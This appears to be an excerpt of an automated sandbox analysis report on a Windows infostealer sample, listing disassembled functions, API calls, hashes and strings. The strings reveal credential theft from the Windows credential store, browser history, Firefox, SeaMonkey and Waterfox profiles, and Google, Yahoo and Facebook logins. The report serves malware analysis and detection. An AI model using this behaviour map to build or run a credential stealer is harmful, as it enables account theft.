                                                                                            • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                            • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                            • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 691 413f4f-413f52 692 413fa5 691->692 693 413f54-413f5a call 40a804 691->693 695 413f5f-413fa4 GetProcAddress * 5 693->695 695->692
                                                                                            APIs
                                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                            • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                            • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                            • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                            • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                            • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                            • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                            • API String ID: 2941347001-70141382
                                                                                            • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                                            • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                                            • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                                            • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 696 4466f4-44670e call 446904 GetModuleHandleA 699 446710-44671b 696->699 700 44672f-446732 696->700 699->700 702 44671d-446726 699->702 701 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 700->701 711 4467ac-4467b7 __setusermatherr 701->711 712 4467b8-44680e call 4468f0 _initterm __wgetmainargs _initterm 701->712 704 446747-44674b 702->704 705 446728-44672d 702->705 704->700 707 44674d-44674f 704->707 705->700 706 446734-44673b 705->706 706->700 709 44673d-446745 706->709 710 446755-446758 707->710 709->710 710->701 711->712 715 446810-446819 712->715 716 44681e-446825 712->716 717 4468d8-4468dd call 44693d 715->717 718 446827-446832 716->718 719 44686c-446870 716->719 720 446834-446838 718->720 721 44683a-44683e 718->721 723 446845-44684b 719->723 724 446872-446877 719->724 720->718 720->721 721->723 725 446840-446842 721->725 727 446853-446864 GetStartupInfoW 723->727 728 44684d-446851 723->728 724->719 725->723 729 446866-44686a 727->729 730 446879-44687b 727->730 728->725 728->727 731 44687c-446894 GetModuleHandleA call 41276d 729->731 730->731 734 446896-446897 exit 731->734 735 44689d-4468d6 _cexit 731->735 734->735 735->717
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                            • String ID:
                                                                                            • API String ID: 2827331108-0
                                                                                            • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                            • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                                                            • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                            • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0040C298
                                                                                              • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                              • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                            • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                            • wcschr.MSVCRT ref: 0040C324
                                                                                            • wcschr.MSVCRT ref: 0040C344
                                                                                            • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                            • GetLastError.KERNEL32 ref: 0040C373
                                                                                            • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                            • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                                                                            • String ID: visited:
                                                                                            • API String ID: 1157525455-1702587658
                                                                                            • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                            • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                            • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                            • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 762 40e175-40e1a1 call 40695d call 406b90 767 40e1a7-40e1e5 memset 762->767 768 40e299-40e2a8 call 4069a3 762->768 770 40e1e8-40e1fa call 406e8f 767->770 774 40e270-40e27d call 406b53 770->774 775 40e1fc-40e219 call 40dd50 * 2 770->775 774->770 780 40e283-40e286 774->780 775->774 786 40e21b-40e21d 775->786 783 40e291-40e294 call 40aa04 780->783 784 40e288-40e290 ??3@YAXPAX@Z 780->784 783->768 784->783 786->774 787 40e21f-40e235 call 40742e 786->787 787->774 790 40e237-40e242 call 40aae3 787->790 790->774 793 40e244-40e26b _snwprintf call 40a8d0 790->793 793->774
                                                                                            APIs
                                                                                              • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                            • memset.MSVCRT ref: 0040E1BD
                                                                                              • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                            • ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                                                                              • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                              • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                              • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                            • _snwprintf.MSVCRT ref: 0040E257
                                                                                              • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                              • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                                              • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                                              • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??3@$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                            • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                            • API String ID: 3883404497-2982631422
                                                                                            • Opcode ID: b10a6b133fecd4ba1fe00162e0f0d1ba32908353d1defd03a55daed51eef6c1a
                                                                                            • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                            • Opcode Fuzzy Hash: b10a6b133fecd4ba1fe00162e0f0d1ba32908353d1defd03a55daed51eef6c1a
                                                                                            • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                              • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                              • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                              • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                            • memset.MSVCRT ref: 0040BC75
                                                                                            • memset.MSVCRT ref: 0040BC8C
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                            • memcmp.MSVCRT ref: 0040BCD6
                                                                                            • memcpy.MSVCRT ref: 0040BD2B
                                                                                            • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$ByteChangeCharCloseFileFindFreeLocalMultiNotificationSizeWide_wcsicmpmemcmpmemcpy
                                                                                            • String ID:
                                                                                            • API String ID: 509814883-3916222277
                                                                                            • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                            • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                            • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                            • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 847 41837f-4183bf 848 4183c1-4183cc call 418197 847->848 849 4183dc-4183ec call 418160 847->849 854 4183d2-4183d8 848->854 855 418517-41851d 848->855 856 4183f6-41840b 849->856 857 4183ee-4183f1 849->857 854->849 858 418417-418423 856->858 859 41840d-418415 856->859 857->855 860 418427-418442 call 41739b 858->860 859->860 863 418444-41845d CreateFileW 860->863 864 41845f-418475 CreateFileA 860->864 865 418477-41847c 863->865 864->865 866 4184c2-4184c7 865->866 867 41847e-418495 GetLastError ??3@YAXPAX@Z 865->867 870 4184d5-418501 memset call 418758 866->870 871 4184c9-4184d3 866->871 868 4184b5-4184c0 call 444706 867->868 869 418497-4184b3 call 41837f 867->869 868->855 869->855 877 418506-418515 ??3@YAXPAX@Z 870->877 871->870 877->855
                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                            • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                                                                            • GetLastError.KERNEL32 ref: 0041847E
                                                                                            • ??3@YAXPAX@Z.MSVCRT ref: 0041848B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateFile$??3@ErrorLast
                                                                                            • String ID: |A
                                                                                            • API String ID: 1407640353-1717621600
                                                                                            • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                                            • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                            • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                                            • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                            • String ID: r!A
                                                                                            • API String ID: 2791114272-628097481
                                                                                            • Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                                                            • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                            • Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                                                            • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                              • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                                                                              • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                                                                              • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                                                                              • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                              • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                              • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                              • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                              • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                              • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                              • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                              • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                              • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                              • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                              • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                            • _wcslwr.MSVCRT ref: 0040C817
                                                                                              • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                              • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                            • wcslen.MSVCRT ref: 0040C82C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$??3@$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                            • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                            • API String ID: 62308376-4196376884
                                                                                            • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                            • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                            • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                            • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                            • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                            • wcslen.MSVCRT ref: 0040BE06
                                                                                            • _wcsncoll.MSVCRT ref: 0040BE38
                                                                                            • memset.MSVCRT ref: 0040BE91
                                                                                            • memcpy.MSVCRT ref: 0040BEB2
                                                                                            • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                                            • wcschr.MSVCRT ref: 0040BF24
                                                                                            • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$CredEnumerateFreeLocal_wcsncoll_wcsnicmpmemcpymemsetwcschrwcslen
                                                                                            • String ID:
                                                                                            • API String ID: 3191383707-0
                                                                                            • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                            • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                                            • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                            • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 00403CBF
                                                                                            • memset.MSVCRT ref: 00403CD4
                                                                                            • memset.MSVCRT ref: 00403CE9
                                                                                            • memset.MSVCRT ref: 00403CFE
                                                                                            • memset.MSVCRT ref: 00403D13
                                                                                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                              • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                              • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                            • memset.MSVCRT ref: 00403DDA
                                                                                              • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                              • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                            • String ID: Waterfox$Waterfox\Profiles
                                                                                            • API String ID: 3527940856-11920434
                                                                                            • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                            • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                            • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                            • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 00403E50
                                                                                            • memset.MSVCRT ref: 00403E65
                                                                                            • memset.MSVCRT ref: 00403E7A
                                                                                            • memset.MSVCRT ref: 00403E8F
                                                                                            • memset.MSVCRT ref: 00403EA4
                                                                                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                              • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                              • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                            • memset.MSVCRT ref: 00403F6B
                                                                                              • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                              • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                            • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                            • API String ID: 3527940856-2068335096
                                                                                            • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                            • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                            • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                            • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 00403FE1
                                                                                            • memset.MSVCRT ref: 00403FF6
                                                                                            • memset.MSVCRT ref: 0040400B
                                                                                            • memset.MSVCRT ref: 00404020
                                                                                            • memset.MSVCRT ref: 00404035
                                                                                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                              • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                              • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                            • memset.MSVCRT ref: 004040FC
                                                                                              • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                              • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                            • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                            • API String ID: 3527940856-3369679110
                                                                                            • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                            • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                                            • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                            • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy
                                                                                            • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                            • API String ID: 3510742995-2641926074
                                                                                            • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                            • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                            • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                            • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                              • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
